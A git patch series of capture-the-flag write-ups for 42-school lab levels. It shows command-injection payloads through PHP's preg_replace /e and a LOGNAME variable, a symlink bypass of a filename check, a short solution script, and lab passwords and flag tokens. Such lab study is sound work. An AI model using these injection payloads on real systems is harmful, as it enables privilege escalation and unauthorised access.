From db531a6c75ce8dfd67ff0d3991341379092bfa57 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:47:23 +0100 Subject: [PATCH 01/28] Update README.mdx --- level00/README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/level00/README.mdx b/level00/README.mdx index eb26ee1..aef75a0 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -1,3 +1,5 @@ +Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) + # SSH ```b From ca425d2300526e000284cc18de4eeac52d830442 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 08:47:39 +0000 Subject: [PATCH 02/28] show READMEs daily --- README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.mdx b/README.mdx index d166c57..71e5831 100644 --- a/README.mdx +++ b/README.mdx @@ -18,6 +18,8 @@ flag02 ft_waNDReL0L +Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) + # SSH ```b From bf256437e80ab8282df95baa87ca2dce60d1adac Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 09:47:48 +0100 Subject: [PATCH 03/28] Update README.mdx --- level00/README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/level00/README.mdx b/level00/README.mdx index aef75a0..9bfaee3 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -1,4 +1,4 @@ -Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) +Subject [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) # SSH From c78c7d07501c25f9bd2d95077024990d30f64b70 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 08:48:02 +0000 Subject: [PATCH 04/28] show READMEs daily --- README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index 71e5831..11f505a 100644 --- a/README.mdx +++ b/README.mdx 
@@ -18,7 +18,7 @@ flag02 ft_waNDReL0L -Subject - [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) +Subject [PDF](https://cdn.intra.42.fr/pdf/pdf/67635/en.subject.pdf) # SSH From 61884db71995d1b3c6939c6dcf0dd95873155e82 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:04:52 +0100 Subject: [PATCH 05/28] Update README.mdx --- level06/README.mdx | 47 ++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 43 insertions(+), 4 deletions(-) diff --git a/level06/README.mdx b/level06/README.mdx index c57f660..8fb661c 100644 --- a/level06/README.mdx +++ b/level06/README.mdx @@ -31,7 +31,6 @@ function y($m) { $m = preg_replace("/@/", " y", $m); return $m; } - function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); 
@@ -39,10 +38,50 @@ function x($y, $z) { $a = preg_replace("/\]/", ")", $a); return $a; } +$r = x($argv[1], $argv[2]); +print $r; +?> +``` -$r = x($argv[1], $argv[2]); print $r; +Inspect `y` function -?> +```b +function y($m) { + $m = preg_replace("/\./", " x ", $m); + $m = preg_replace("/@/", " y", $m); + return $m; +} +``` + +Notes - function y filters m twice +1. `" x "` replaces all regex `/./` +2. `" y"` replaces all regex `/@/` + +Inspect `x` function + +```b +function x($y, $z) { + $a = file_get_contents($y); + $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); + $a = preg_replace("/\[/", "(", $a); + $a = preg_replace("/\]/", ")", $a); + return $a; +} ``` -🟡 notes in `sea` +Notes - function x filters `argv[1]` +1. `"/(\[x (.*)\])/e"` + - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` + - `/e` will eval the `y(\"\\2\")` as PHP code + - :yellow_circle: `/e` modifier only evaluates the replacement string we provide + - :yellow_circle: `/e` is deprecated long ago +2. `(` and `)` replace all `[` and `]` in the result respectively +- the func disregards argv[2] + +Solution +- figure one way + - ```[x ${`getflag`}]``` + - `${`getflag`}` captured + - ````getflag```` the backticks = doing `shell_exec()` + - `${ret}` + From 27311e0ab679432fcbcfdaa5c47e1c649779eb6c Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 10:05:09 +0000 Subject: [PATCH 06/28] show READMEs daily --- README.mdx | 47 +++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 43 insertions(+), 4 deletions(-) diff --git a/README.mdx b/README.mdx index 11f505a..c0bf0b4 100644 --- a/README.mdx +++ b/README.mdx @@ -482,7 +482,6 @@ function y($m) { $m = preg_replace("/@/", " y", $m); return $m; } - function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); 
@@ -490,13 +489,53 @@ function x($y, $z) { $a = preg_replace("/\]/", ")", $a); return $a; } +$r = x($argv[1], $argv[2]); +print $r; +?> +``` -$r = x($argv[1], $argv[2]); print $r; +Inspect `y` function -?> +```b +function y($m) { + $m = preg_replace("/\./", " x ", $m); + $m = preg_replace("/@/", " y", $m); + return $m; +} ``` -🟡 notes in `sea` +Notes - function y filters m twice +1. `" x "` replaces all regex `/./` +2. `" y"` replaces all regex `/@/` + +Inspect `x` function + +```b +function x($y, $z) { + $a = file_get_contents($y); + $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); + $a = preg_replace("/\[/", "(", $a); + $a = preg_replace("/\]/", ")", $a); + return $a; +} +``` + +Notes - function x filters `argv[1]` +1. `"/(\[x (.*)\])/e"` + - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` + - `/e` will eval the `y(\"\\2\")` as PHP code + - :yellow_circle: `/e` modifier only evaluates the replacement string we provide + - :yellow_circle: `/e` is deprecated long ago +2. `(` and `)` replace all `[` and `]` in the result respectively +- the func disregards argv[2] + +Solution +- figure one way + - ```[x ${`getflag`}]``` + - `${`getflag`}` captured + - ````getflag```` the backticks = doing `shell_exec()` + - `${ret}` + # 07 - Todo From af808391298ec3d635911fbb6852606739a5bee0 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:34:40 +0100 Subject: [PATCH 07/28] 6/done --- level06/README.mdx | 32 ++++++++++++++++++++++++-------- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/level06/README.mdx b/level06/README.mdx index 8fb661c..7d9d00d 100644 --- a/level06/README.mdx +++ b/level06/README.mdx 
@@ -5,9 +5,14 @@ Login ```b > ssh level06@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: viuaaale9huek52boumoomioc +> ls -l +-rwsr-x---+ 1 flag06 level06 7503 level06 +-rwxr-x--- 1 flag06 level06 356 level06.php ``` -Inspect (there are 2 files) +There are 2 files. + +Inspect: ```b > file level06 @@ -53,7 +58,7 @@ function y($m) { } ``` -Notes - function y filters m twice +Function `y` filters m twice 1. `" x "` replaces all regex `/./` 2. `" y"` replaces all regex `/@/` @@ -69,7 +74,7 @@ function x($y, $z) { } ``` -Notes - function x filters `argv[1]` +Function `x` filters `argv[1]` 1. `"/(\[x (.*)\])/e"` - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` - `/e` will eval the `y(\"\\2\")` as PHP code @@ -78,10 +83,21 @@ Notes - function x filters `argv[1]` 2. `(` and `)` replace all `[` and `]` in the result respectively - the func disregards argv[2] +Our goal +- `file_get_contents($argv[1])` depends on ___content___ of the file +- so `argv[1]` to a FILE +- it should be oneline in form of `[x `_cap_`]` + Solution -- figure one way - - ```[x ${`getflag`}]``` - - `${`getflag`}` captured - - ````getflag```` the backticks = doing `shell_exec()` - - `${ret}` +```b +# get the _token/flag_ in there to be captured and printed out + # shell_exec() system() exec() or simply backticks +# `getflag` called +# ${`getflag`} - get the ret +# [x ${`getflag`}] - framed in this form +# echo $(oneliner) > /tmp/temp - push it to a FILE + +> echo '[x ${`getflag`}]' > /tmp/temp +> ./level06 /tmp/temp +``` From 1583f40d13eb63b2c42befffadf9537b92ae117d Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 10:34:55 +0000 Subject: [PATCH 08/28] show READMEs daily --- README.mdx | 32 ++++++++++++++++++++++++-------- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/README.mdx b/README.mdx index c0bf0b4..71529c5 100644 --- a/README.mdx +++ b/README.mdx 
@@ -456,9 +456,14 @@ Login ```b > ssh level06@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: viuaaale9huek52boumoomioc +> ls -l +-rwsr-x---+ 1 flag06 level06 7503 level06 +-rwxr-x--- 1 flag06 level06 356 level06.php ``` -Inspect (there are 2 files) +There are 2 files. + +Inspect: ```b > file level06 @@ -504,7 +509,7 @@ function y($m) { } ``` -Notes - function y filters m twice +Function `y` filters m twice 1. `" x "` replaces all regex `/./` 2. `" y"` replaces all regex `/@/` @@ -520,7 +525,7 @@ function x($y, $z) { } ``` -Notes - function x filters `argv[1]` +Function `x` filters `argv[1]` 1. `"/(\[x (.*)\])/e"` - matches `[x `_cap_`]` and insert 2nd captured group to string `y("`_cap_`")` - `/e` will eval the `y(\"\\2\")` as PHP code @@ -529,13 +534,24 @@ Notes - function x filters `argv[1]` 2. `(` and `)` replace all `[` and `]` in the result respectively - the func disregards argv[2] +Our goal +- `file_get_contents($argv[1])` depends on ___content___ of the file +- so `argv[1]` to a FILE +- it should be oneline in form of `[x `_cap_`]` + Solution -- figure one way - - ```[x ${`getflag`}]``` - - `${`getflag`}` captured - - ````getflag```` the backticks = doing `shell_exec()` - - `${ret}` +```b +# get the _token/flag_ in there to be captured and printed out + # shell_exec() system() exec() or simply backticks +# `getflag` called +# ${`getflag`} - get the ret +# [x ${`getflag`}] - framed in this form +# echo $(oneliner) > /tmp/temp - push it to a FILE + +> echo '[x ${`getflag`}]' > /tmp/temp +> ./level06 /tmp/temp +``` # 07 - Todo From 1bbc312011e90551c0433bdecbf1a566733841b4 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:41:51 +0100 Subject: [PATCH 09/28] Create not_for_use.sh --- level06/not_for_use.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 level06/not_for_use.sh 
diff --git a/level06/not_for_use.sh b/level06/not_for_use.sh new file mode 100644 index 0000000..c85f31f --- /dev/null +++ b/level06/not_for_use.sh @@ -0,0 +1,3 @@ +rm -rf /tmp/temp +echo '[x ${`getflag`}]' > /tmp/tmp +./level06 /tmp/tmp From 41a7d3c9f47c8397046c0a65cec2fa1e2b5092e1 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:13:50 +0100 Subject: [PATCH 10/28] 7/done --- level07/README.mdx | 73 +++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 72 insertions(+), 1 deletion(-) diff --git a/level07/README.mdx b/level07/README.mdx index 7687a39..b29ccb5 100644 --- a/level07/README.mdx +++ b/level07/README.mdx 
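Review bot: The cleanup on the first line of `level06/not_for_use.sh` removes `/tmp/temp`, but the next two lines write and read `/tmp/tmp`, so the `rm` never touches the file this script actually uses. It should be `rm -f /tmp/tmp`, since `-r` is unnecessary for a regular file. A fixed name in world-writable `/tmp` can also be pre-created or symlinked by another local user before the redirect runs, so `f=$(mktemp)` with `"$f"` in place of both `/tmp/tmp` occurrences would be safer. The file has no shebang; adding `#!/bin/sh` as the first line would make the intended interpreter explicit.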
@@ -1 +1,72 @@ -# 07 - Todo +# 07 + +Login + +```b +> ssh level07@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: wiok45aaoguiboiki2tuin6ub +> ls -l +-rwsr-sr-x 1 flag07 level07 8805 level07 +``` + +First thought: + - options: (not running it, just to see what it _prints_) + +```b +> file level07 +> strings level07 +> xxd level07 | grep level +> xxd level07 | grep -A3 -B3 level +> readelf -s ./level07 | grep -E 'getenv|system|exec|echo|puts|write|printf' +> objdump -d level07 | grep -E "getenv|system|exec|echo|puts|write|printf" + regex ^^ +``` + +Using `readelf -p .rodata` and `ltrace` +- `-p` : `string-dump` displays contents of a section as printable str +- `.rodata` : `read-only data` section = what we want to see + +```b +> readelf -p .rodata ./level07 +String dump of section '.rodata': + [ 8] LOGNAME + ^^^^^^^ 🟡 + [ 10] /bin/echo %s +``` +```b +> ltrace ./level07 + +__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 +getegid() = 2007 +geteuid() = 2007 +setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +getenv("LOGNAME") = "level07" + ^^^^^^^ 🟡 +asprintf(0xbffff744, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 18 +system("/bin/echo level07 "level07 + +--- SIGCHLD (Child exited) --- +<... system resumed> ) = 0 ++++ exited (status 0) +++ +``` + +Run it and we found that it prints `LOGNAME` + +```b +> ./level07 whoami +level07 +> man env +> env logname +level06 +> export LOGNAME='`id`' +> ./level07 +uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07) +``` + +Solution +```b +> export LOGNAME='`getflag`' +> ./level07 + + From 961760512501ee002227e45cf1037d64f42e750e Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:14:07 +0000 Subject: [PATCH 11/28] show READMEs daily --- README.mdx | 73 +++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 72 insertions(+), 1 deletion(-) 
diff --git a/README.mdx b/README.mdx index 71529c5..aac5662 100644 --- a/README.mdx +++ b/README.mdx @@ -554,5 +554,76 @@ Solution ``` -# 07 - Todo +# 07 + +Login + +```b +> ssh level07@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: wiok45aaoguiboiki2tuin6ub +> ls -l +-rwsr-sr-x 1 flag07 level07 8805 level07 +``` + +First thought: + - options: (not running it, just to see what it _prints_) + +```b +> file level07 +> strings level07 +> xxd level07 | grep level +> xxd level07 | grep -A3 -B3 level +> readelf -s ./level07 | grep -E 'getenv|system|exec|echo|puts|write|printf' +> objdump -d level07 | grep -E "getenv|system|exec|echo|puts|write|printf" + regex ^^ +``` + +Using `readelf -p .rodata` and `ltrace` +- `-p` : `string-dump` displays contents of a section as printable str +- `.rodata` : `read-only data` section = what we want to see + +```b +> readelf -p .rodata ./level07 +String dump of section '.rodata': + [ 8] LOGNAME + ^^^^^^^ 🟡 + [ 10] /bin/echo %s +``` +```b +> ltrace ./level07 + +__libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 +getegid() = 2007 +geteuid() = 2007 +setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280) = 0 +getenv("LOGNAME") = "level07" + ^^^^^^^ 🟡 +asprintf(0xbffff744, 0x8048688, 0xbfffff4b, 0xb7e5ee55, 0xb7fed280) = 18 +system("/bin/echo level07 "level07 + +--- SIGCHLD (Child exited) --- +<... system resumed> ) = 0 ++++ exited (status 0) +++ +``` + +Run it and we found that it prints `LOGNAME` + +```b +> ./level07 whoami +level07 +> man env +> env logname +level06 +> export LOGNAME='`id`' +> ./level07 +uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07) +``` + +Solution +```b +> export LOGNAME='`getflag`' +> ./level07 + + From e19370a78f5a5feb69921110927d69c0255d5b5b Mon Sep 17 00:00:00 2001 
From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:15:27 +0100 Subject: [PATCH 12/28] Update README.mdx --- level07/README.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/level07/README.mdx b/level07/README.mdx index b29ccb5..7b76794 100644 --- a/level07/README.mdx +++ b/level07/README.mdx @@ -68,5 +68,4 @@ Solution ```b > export LOGNAME='`getflag`' > ./level07 - - +``` From 320a291327c6f88fde74abd95cca0949a6069a7f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:15:45 +0000 Subject: [PATCH 13/28] show READMEs daily --- README.mdx | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.mdx b/README.mdx index aac5662..5a34903 100644 --- a/README.mdx +++ b/README.mdx @@ -624,6 +624,5 @@ Solution ```b > export LOGNAME='`getflag`' > ./level07 - - +``` From f61372061f4b59cce2e18c29354564341319d3f9 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:30:54 +0100 Subject: [PATCH 14/28] Create README.mdx --- level08/README.mdx | 65 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 level08/README.mdx diff --git a/level08/README.mdx b/level08/README.mdx new file mode 100644 index 0000000..f94c54b --- /dev/null +++ b/level08/README.mdx 
@@ -0,0 +1,65 @@ +# 08 + +Login + +```b +> ssh level08@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: fiumuikeil55xe9cu4dood66h +> ls -l +-rwsr-s---+ 1 flag08 level08 8617 level08 +-rw------- 1 flag08 flag08 26 token +``` + +2 files: + +```b +> cat token +cat: token: Permission denied + +> ./level08 +./level08 [file to read] +``` + +Tryout + +```b +# run it + +> echo "a" > /tmp/tmp && ./level08 /tmp/tmp +a +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB + +# ltrace + +> ltrace ./level08 /tmp +__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 +strstr("/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp", 0, 014435162522) = -1 +err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied + ++++ exited (status 1) +++ + +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "aB\n", 1024) = 3 +write(1, "aB\n", 3aB +) = 3 ++++ exited (status 3) +++ +``` + +Observation: +- it reads the contents of a file +- as long as the filename contains no "token" as substr +- renaming `./token` is not allowed +- but we can make a symlink of it + - syntax: `ln -s real_path_src real_path_symlink` + +Solution +```b +> ln -s `realpath token` /tmp/tok +``` From 644ccc2af3df5020b97b180330a737e152c0a425 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:31:10 +0000 Subject: [PATCH 15/28] show READMEs daily --- README.mdx | 67 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 67 insertions(+) diff --git a/README.mdx b/README.mdx index 5a34903..1ea0375 100644 --- a/README.mdx +++ b/README.mdx 
@@ -626,3 +626,70 @@ Solution > ./level07 ``` + +# 08 + +Login + +```b +> ssh level08@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: fiumuikeil55xe9cu4dood66h +> ls -l +-rwsr-s---+ 1 flag08 level08 8617 level08 +-rw------- 1 flag08 flag08 26 token +``` + +2 files: + +```b +> cat token +cat: token: Permission denied + +> ./level08 +./level08 [file to read] +``` + +Tryout + +```b +# run it + +> echo "a" > /tmp/tmp && ./level08 /tmp/tmp +a +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB + +# ltrace + +> ltrace ./level08 /tmp +__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 +strstr("/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp", 0, 014435162522) = -1 +err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied + ++++ exited (status 1) +++ + +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +^^^^^^ ^^^^^ 🟡 +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "aB\n", 1024) = 3 +write(1, "aB\n", 3aB +) = 3 ++++ exited (status 3) +++ +``` + +Observation: +- it reads the contents of a file +- as long as the filename contains no "token" as substr +- renaming `./token` is not allowed +- but we can make a symlink of it + - syntax: `ln -s real_path_src real_path_symlink` + +Solution +```b +> ln -s `realpath token` /tmp/tok +``` + From 616d8a449ca49460da31bd7f104dd73ab67b9dac Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:33:18 +0100 Subject: [PATCH 16/28] Update README.mdx --- level08/README.mdx | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/level08/README.mdx b/level08/README.mdx index f94c54b..65955b6 100644 --- a/level08/README.mdx +++ b/level08/README.mdx 
@@ -53,13 +53,15 @@ write(1, "aB\n", 3aB ``` Observation: -- it reads the contents of a file -- as long as the filename contains no "token" as substr + +- it reads file contents, as long as the filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` Solution + ```b -> ln -s `realpath token` /tmp/tok +> ln -s `realpath token` /tmp/totem +> ./level08 /tmp/totem ``` From 1af132d697c3ac6f8868c38749c50d2f4eda2f68 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:33:35 +0000 Subject: [PATCH 17/28] show READMEs daily --- README.mdx | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/README.mdx b/README.mdx index 1ea0375..79ecc66 100644 --- a/README.mdx +++ b/README.mdx @@ -682,14 +682,16 @@ write(1, "aB\n", 3aB ``` Observation: -- it reads the contents of a file -- as long as the filename contains no "token" as substr + +- it reads file contents, as long as the filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` Solution + ```b -> ln -s `realpath token` /tmp/tok +> ln -s `realpath token` /tmp/totem +> ./level08 /tmp/totem ``` From e01c582ab01b37c48b6d1b41ce796b112f3ab5a0 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:40:10 +0100 Subject: [PATCH 18/28] Update README.mdx --- level08/README.mdx | 37 ++++++++++++++++++------------------- 1 file changed, 18 insertions(+), 19 deletions(-) diff --git a/level08/README.mdx b/level08/README.mdx index 65955b6..e239501 100644 --- a/level08/README.mdx +++ b/level08/README.mdx 
@@ -23,38 +23,37 @@ cat: token: Permission denied Tryout ```b -# run it - > echo "a" > /tmp/tmp && ./level08 /tmp/tmp a -> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp -aB -# ltrace +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ +``` -> ltrace ./level08 /tmp -__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 -strstr("/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 -open("/tmp", 0, 014435162522) = -1 -err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied - -+++ exited (status 1) +++ +```b +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB > ltrace ./level08 /tmp/tmp __libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 strstr("/tmp/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 open("/tmp/tmp", 0, 014435162522) = 3 -read(3, "aB\n", 1024) = 3 -write(1, "aB\n", 3aB -) = 3 -+++ exited (status 3) +++ +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ ``` Observation: -- it reads file contents, as long as the filename contains no substr "token" +- only the filename matters +- `./level` will cat the file, as long as filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` From 11dfeae19f89215fa8c52dbe0e6ad8605fe3337e Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:40:26 +0000 Subject: [PATCH 19/28] show READMEs daily --- README.mdx | 37 ++++++++++++++++++------------------- 1 file changed, 18 insertions(+), 19 deletions(-) diff --git a/README.mdx b/README.mdx index 79ecc66..2a60c52 100644 --- a/README.mdx +++ b/README.mdx 
@@ -652,38 +652,37 @@ cat: token: Permission denied Tryout ```b -# run it - > echo "a" > /tmp/tmp && ./level08 /tmp/tmp a -> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp -aB -# ltrace +> ltrace ./level08 /tmp/tmp +__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 +strstr("/tmp/tmp", "token") = NULL +open("/tmp/tmp", 0, 014435162522) = 3 +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ +``` -> ltrace ./level08 /tmp -__libc_start_main(0x8048554, 2, 0xbffff7e4, 0x80486b0, 0x8048720 -strstr("/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 -open("/tmp", 0, 014435162522) = -1 -err(1, 0x80487b2, 0xbffff90a, 0xb7fe765d, 0xb7e3ebaflevel08: Unable to open /tmp: Permission denied - -+++ exited (status 1) +++ +```b +> echo "aB" > /tmp/tmp && ./level08 /tmp/tmp +aB > ltrace ./level08 /tmp/tmp __libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 strstr("/tmp/tmp", "token") = NULL -^^^^^^ ^^^^^ 🟡 open("/tmp/tmp", 0, 014435162522) = 3 -read(3, "aB\n", 1024) = 3 -write(1, "aB\n", 3aB -) = 3 -+++ exited (status 3) +++ +read(3, "a\n", 1024) = 2 +write(1, "a\n", 2a +) = 2 ++++ exited (status 2) +++ ``` Observation: -- it reads file contents, as long as the filename contains no substr "token" +- only the filename matters +- `./level` will cat the file, as long as filename contains no substr "token" - renaming `./token` is not allowed - but we can make a symlink of it - syntax: `ln -s real_path_src real_path_symlink` From da083e02802a183933b01a553579c13a2d21573c Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:42:54 +0100 Subject: [PATCH 20/28] Update tokens.mdx --- tokens.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/tokens.mdx b/tokens.mdx index cc3ec12..55c1de9 100644 --- a/tokens.mdx +++ b/tokens.mdx 
@@ -9,6 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h +level09 quif5eloekouj29ke0vouxean (end of mandatory) flag00 nottoohardhere flag01 abcdefg From 581115a3d065b9d09534edee16ca4aa8ae68b316 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:43:05 +0100 Subject: [PATCH 21/28] Update tokens.mdx --- tokens.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index 55c1de9..c61dcdb 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -9,7 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean (end of mandatory) +level09 quif5eloekouj29ke0vouxean flag00 nottoohardhere flag01 abcdefg From 411be64b93fedde36021f428d14da5d0b91c266f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:43:19 +0000 Subject: [PATCH 22/28] show READMEs daily --- README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/README.mdx b/README.mdx index 2a60c52..db8b24e 100644 --- a/README.mdx +++ b/README.mdx @@ -9,6 +9,7 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h +level09 quif5eloekouj29ke0vouxean flag00 nottoohardhere flag01 abcdefg From c801d98cc1be6584a4830a80b71bf78ba217c984 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:47:03 +0100 Subject: [PATCH 23/28] Update tokens.mdx --- tokens.mdx | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index c61dcdb..70822b1 100644 --- a/tokens.mdx +++ b/tokens.mdx 
